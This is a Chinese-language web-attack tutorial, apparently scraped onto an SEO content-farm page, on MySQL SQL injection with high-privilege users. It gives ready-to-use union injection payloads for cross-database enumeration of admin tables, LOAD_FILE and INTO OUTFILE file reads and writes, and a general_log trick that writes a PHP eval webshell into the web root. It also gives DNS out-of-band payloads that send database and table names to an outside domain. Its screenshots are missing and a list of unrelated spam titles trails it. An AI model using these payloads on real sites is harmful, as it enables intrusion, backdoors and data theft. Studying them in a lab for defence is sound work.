当前位置: 首页 > wzjs >正文

万网虚拟空间 asp.net多网站部署网络营销方法有几种类型

万网虚拟空间 asp.net多网站部署,网络营销方法有几种类型,商务网站建设与维护 ppt,广州市网站集约化建设工作要求知识点: 1、Web攻防-SQL注入-高权限用户差异 2、Web攻防-SQL注入-跨库注入&文件读写&DNS带外 案例说明: 在应用中,数据库用户不同,可操作的数据库和文件读写权限不一,所有在注入过程中可以有更多的利用思路&a…

知识点:
1、Web攻防-SQL注入-高权限用户差异
2、Web攻防-SQL注入-跨库注入&文件读写&DNS带外

案例说明:
在应用中,数据库用户不同,可操作的数据库和文件读写权限不一,所有在注入过程中可以有更多的利用思路,如直接写入后门,获取数据库下洽谈网站的数据等。

一、演示案例-WEB攻防-SQL注入-高权限&数据库名获取&文件读写操作&secure_file_priv开关

实验:root用户和普通用户

在这里插入图片描述

1、所有数据库名获取

在这里插入图片描述

2、文件读写操作权限

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验:secure_file_priv开关(限制文件读取和写入)

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入
通过my.ini(windows版本)/my.cnf(Linux版本)中设置

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

绕过条件

存在可执行的SQL语句的地方(后台SQL命令执行,Phpmyadmin应用等)从后台的sql命令执行功能点:通过注入获取得到这个网站的后台账号密码
从phpmyadmin命令执行功能点:通过注入获取到数据库的用户名和密码
phpmyadmin的用户密码存储在mysql数据库下的user表(mysql低版本是user、password列名或mysql高版本是user、authentication_string为列名)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

getshellshow variables like "secure%" //查看secure_file_priv开关是否开启
slow_query_log=1 启用慢查询日志(默认禁用)
set global general_log=on; //开启日志功能
show variables like 'general_log'; //查看日志是否开启
set global general_log_file='D:/phpstudy_pro/WWW/php/55/bypass.php';
select '<?php @eval($_POST[x]);?>'

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-SQL注入-高权限&文件读写操作&跨库注入&带外注入

文件读写

' union select LOAD_FILE('d:\\2.txt'),2,3#

在这里插入图片描述
在这里插入图片描述

' union select 'xxxx',2,3 into outfile 'd:\\3.txt'#

在这里插入图片描述
在这里插入图片描述
实战中一般就是直接写webshell进网站目录下,那么关于网站路径获取方法:

1、遗留文件(phpinfo)
在这里插入图片描述
2、报错显示
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3、读中间件配置
4、爆破fuzz路径

跨库注入

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

查数据库名

' union select SCHEMA_name,2,3 from information_schema.SCHEMATA#

在这里插入图片描述
在这里插入图片描述

查表名

' union select table_name,2,3 from information_schema.tables where table_schema='xhcms'#

在这里插入图片描述
在这里插入图片描述

查列名

' union select column_name,2,3 from information_schema.columns where table_schema='xhcms' and table_name='manage'#

在这里插入图片描述
在这里插入图片描述

查数据

' union select name,2,3 from xhcms.manage#

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

带外注入(读文件无回显)

查数据库名

' union select load_file(concat('\\\\',(select database()),'.yjjoxijrhw.yutu.eu.org\\aa')),2,3#

在这里插入图片描述
在这里插入图片描述

查第一个表名

' union select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='news_management' limit 0,1 ),".yjjoxijrhw.yutu.eu.org\\xxx.txt")),2,3#

在这里插入图片描述
在这里插入图片描述

查第二个表名

' union select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='news_management' limit 1,1 ),".yjjoxijrhw.yutu.eu.org\\xxx.txt")),2,3#

查第三个表名

' union select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='news_management' limit 2,1 ),".yjjoxijrhw.yutu.eu.org\\xxx.txt")),2,3#

查列名:…

查数据

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

http://www.dtcms.com/wzjs/356815.html

相关文章:

  • 龙华网站建设-信科网络百度集团股份有限公司
  • 网站建设的工作方法广州最新消息
  • 珠宝网站建商台北谷歌优化排名哪家强
  • 娄底建网站seo刷关键词排名优化
  • gzip压缩网站单页应用seo如何解决
  • 深圳高品质网站建设服务重大军事新闻
  • 知名商城网站建设价格安卓优化大师官方版
  • 建一个漫画网站关于网站推广
  • b2b网站推广方案 行业会议网站关键词搜索排名
  • 西宁北京网站建设完美日记网络营销策划书
  • 政府网站建设怎么做软文推广渠道主要有
  • 电子商务网站建设目的营销手机都有什么功能啊
  • 微信公众号上漂亮的模板怎么弄免费的seo优化工具
  • wordpress如何修改用户名密码西安网站优化公司
  • 工业皮带怎么做免费的网站今日热搜头条
  • 摄影网站设计成人培训班有哪些课程
  • 学网站开发怎么就业桔子seo工具
  • 电商网站建设与管理百度网盘资源分享
  • wordpress 大型网站吗厦门网站到首页排名
  • wordpress画廊尺寸多大合肥网站快速优化排名
  • 怎么让网站页面自适应襄阳网站推广优化技巧
  • qq空间做宣传网站长沙百度推广排名优化
  • 网站建设域名什么意思权重查询
  • 做网站需要什么专业方向的员工百度推广登录后台
  • .net网站开发文档对搜索引擎优化的认识
  • 资源类网站怎么做的泉州百度关键词排名
  • 做网站公司(信科网络)推广工具有哪些
  • 四川城乡建设网站证件查询河南网站优化排名
  • 中国工程建设标准化协会官方网站网络客服
  • 日本男女做受网站搜索引擎大全全搜网